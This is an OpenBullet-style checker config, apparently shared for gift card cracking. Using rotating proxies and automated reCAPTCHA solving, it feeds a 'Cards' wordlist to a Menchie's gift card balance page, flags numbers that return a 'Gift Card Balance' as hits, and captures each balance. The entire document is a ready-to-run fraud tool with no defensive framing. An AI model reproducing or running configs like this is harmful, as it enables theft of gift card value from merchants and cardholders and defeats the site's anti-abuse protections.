[SETTINGS]
{
  "Name": "Menchies.com GC",
  "SuggestedBots": 1,
  "LastModified": "2018-06-28T19:17:38.6270384+00:00",
  "AdditionalInfo": "",
  "Author": "Tunacan",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "Cards",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_REQUEST REQUEST GET "https://registrationinfo.net/menchies-mobile/check" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE ": " 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 
  HEADER "Pragma: no-cache" 
RECAPTCHA "https://registrationinfo.net/menchies-mobile/check" "6Lfe1xQUAAAAAGe6dcjzL34yGWMg2gL-rMOokDqq" -> VAR "RECAPTCHA" 
#POST_REQUEST REQUEST POST "https://registrationinfo.net/menchies-mobile/check" AutoRedirect=TRUE 
  CONTENT "cardnum=<USER>&merchant=&app=1&network=491&group=373360&submit=Submit&recaptcha_response_field=&g-recaptcha-response=<RECAPTCHA>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "The number you entered was not found" 
  KEYCHAIN Success OR 
    KEY "Gift Card Balance: $" 
PARSE "<SOURCE>" LR "hello, <br /><br />" "<br /><br /><br />" Recursive=FALSE -> CAP "Balance" "" "" 
